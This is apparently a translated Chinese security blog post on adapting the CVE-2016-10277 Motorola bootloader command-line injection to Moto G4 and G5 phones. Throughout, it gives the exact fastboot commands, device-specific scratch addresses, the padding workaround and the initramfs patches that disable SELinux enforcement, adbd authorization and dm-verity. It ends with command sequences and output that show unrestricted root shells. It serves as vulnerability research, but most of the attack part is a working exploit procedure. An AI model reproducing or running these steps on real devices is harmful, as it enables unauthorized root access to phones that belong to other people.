导语:摩托罗拉Android Bootloader(ABOOT)的版本漏洞允许内核命令行注入。
在之前的文章中,我们曾提到CVE-2016-10277可能会影响其他摩托罗拉设备。而在Twitter上收到一些相关的报告之后,我们购买了摩托罗拉的几台设备,并且更新到最新的可用版本以进行此次的测试。
Moto G4 athene XT1622,运行的系统:NPJS25.93-14.4,bootloader moto-msm8952-B1.05。 Moto G5 cedric XT1676,运行的系统:NPP25.137-33,bootloader moto-msm8937-B8.09。
前文回顾
1、摩托罗拉Android Bootloader(ABOOT)的版本漏洞允许内核命令行注入。
2、我们可以注入一个名为initrd的参数,这使我们能够迫使Linux内核从指定的物理地址来填充initramfs到rootfs。
3、我们可以为了把我们自己的恶意initramfs放置在一个已知的物理地址名为SCRATCH_ADDR(0x11000000适用于Nexus 6)而滥用ABOOT下载功能,。
4、利用此漏洞攻击者可以获得无限制的root shell。
在Moto G4&G5上验证CVE-2016-10277
验证设备确实存在该漏洞的是非常简单的,一个简单的fastboot oem config fsg-id "a androidboot.foo=bar"导致ro.boot.foo创建属性:
$ fastboot oem config fsg-id "a androidboot.foo=bar" ... (bootloader) <UTAG name="fsg-id" type="str" protected="false"> (bootloader) <value> (bootloader) a androidboot.foo=bar (bootloader) </value> (bootloader) <description> (bootloader) FSG IDs, see http://goo.gl/gPmhU (bootloader) </description> (bootloader) </UTAG> OKAY [ 0.013s] $ fastboot continue $ adb shell cedric:/ $ getprop ro.boot.foo bar cedric:/ $
这证明了这个参数已被注入到cedric内核命令行中。(有类似的结果athene)
接下来,我们验证了我们可以控制initrd参数,这允许我们强制Linux内核initramfs从指定的物理地址加载。我们运行了fastboot oem config fsg-id "a initrd=0x12345678,1234",并且期望内核崩溃。事实上,它确实崩溃了!
移植到Moto G4&G5
如上所述,在我们利用此漏洞之前,需要解决两个G4&G5具体要求:
1、查找SCRATCH_ADDR引导程序使用的值。 2、创建恶意initramfs档案。
查找SCRATCH_ADDR值
加载athene的和cedric的ABOOTs在IDA中很快显示出了SCRATCH_ADDR:
// athene signed int target_get_scratch_address() { return 0x90000000; } // cedric signed int target_get_scratch_address() { return 0xA0100000; }
验证SCRATCH_ADDR值
在我们进入恶意initramfs创建之前,我们想验证这些SCRATCH_ADDR的值确实是正确的,否则很难确定潜在的问题。而事实也说明了我们的这一计划非常正确,我们将在下面看到结果。
为了验证地址,我们initramfs从摩托罗拉官方固件中的引导映像中提取原始存档。然后,我们利用这个漏洞加载官方initramfs,而不是从SCRATCH_ADDR。
$ fastboot oem config fsg-id "a initrd=0x90000000,1766036" ... (bootloader) <UTAG name="fsg-id" type="str" protected="false"> (bootloader) <value> (bootloader) a initrd=0x90000000,1766036 (bootloader) </value> (bootloader) <description> (bootloader) FSG IDs, see http://goo.gl/gPmhU (bootloader) </description> (bootloader) </UTAG> OKAY [ 0.015s] finished. total time: 0.015s $ fastboot flash aleph initramfs.cpio.gz target reported max download size of 536870912 bytes sending 'aleph' (1725 KB)... OKAY [ 1.088s] writing 'aleph'... (bootloader) Invalid partition name aleph FAILED (remote failure) finished. total time: 1.095s $ fastboot continue
显然这不是正常加载,设备也因此进入了无限的引导循环,这让我们感到很困惑。
填充Payload
然后我们进行了大胆的猜测。我们已经意识到,当我们上传initramfs到SCRATCH_ADDR中,之前ABOOT跳跃到Linux内核中,cedric的以及athene的ABOOTs会把一些其他不相关的数据放到SCRATCH_ADDR中,破坏我们的initramfs(但不是全部)。
要想克服这个困难,可以在initramfs之前进行填充数据,并相应地进行initrd调整(到 SCRATCH_ADDR + sizeof(PADDING))。因此,如果我们的假设是真实的,我们将在Linux内核执行之前具有以下内存布局:
.--------------------------------.----------------------. | Physical Address | Data | |--------------------------------|----------------------| | SCRATCH_ADDR | Corrupted PADDING | | SCRATCH_ADDR + sizeof(PADDING) | Controlled initramfs | `--------------------------------'----------------------'
使用这种技术,通过32MB的padding(0x20000000)都解决了我们的引导循环。
为Moto G4&G5创建initramfs
在Nexus 6的环境下,为了创建一个initramfs来使adb给我们一个无限制的root shell,我们刚刚已经编译了一个AOSP userdebug图像,这样做是因为userdebug 图像拥有可以胜任的su的SELinux域,以及给定一些系统性能的adbd,不是setuid/ setgid到shell,也不放弃自己的能力,不要求授权。
由于我们没有Moto G4和Moto G5的构建配置,我们决定采取最快的路径,修补官方initramfs档案:
1、通过Patching init,我们已经将SELinux置于permissive模式。结果代码类似于以下内容:
static void selinux_initialize(bool in_kernel_domain) { [...] if (in_kernel_domain) { [...] bool is_enforcing = selinux_is_enforcing(); security_setenforce(0); // always permissive [...] }
2、修补adbd,使其保持为root并且不会降低其功能。(我们用NOPs 替换了相关的电话)。
3、修补adbd,不要求授权。(我们将auth_required全局设置为0)。
4、dm-verity在相关分区上禁用
5、删除了锁定的设备USB策略 init.mmi.usb.sh
6、其他
更新PoC上的可用initroot库。
做完所有这些:成功拿到root shell!
在Moto G4:
$ fastboot oem config fsg-id "a initrd=0x92000000,1774281" $ fastboot flash aleph initroot-athene.cpio.gz $ fastboot continue $ adb shell athene:/ # id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 athene:/ # getenforce Permissive athene:/ #
在Moto G5上:
$ fastboot flash aleph initroot-cedric.cpio.gz $ fastboot continue$ adb shell cedric:/ # id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 cedric:/ # getenforce Permissive cedric:/ #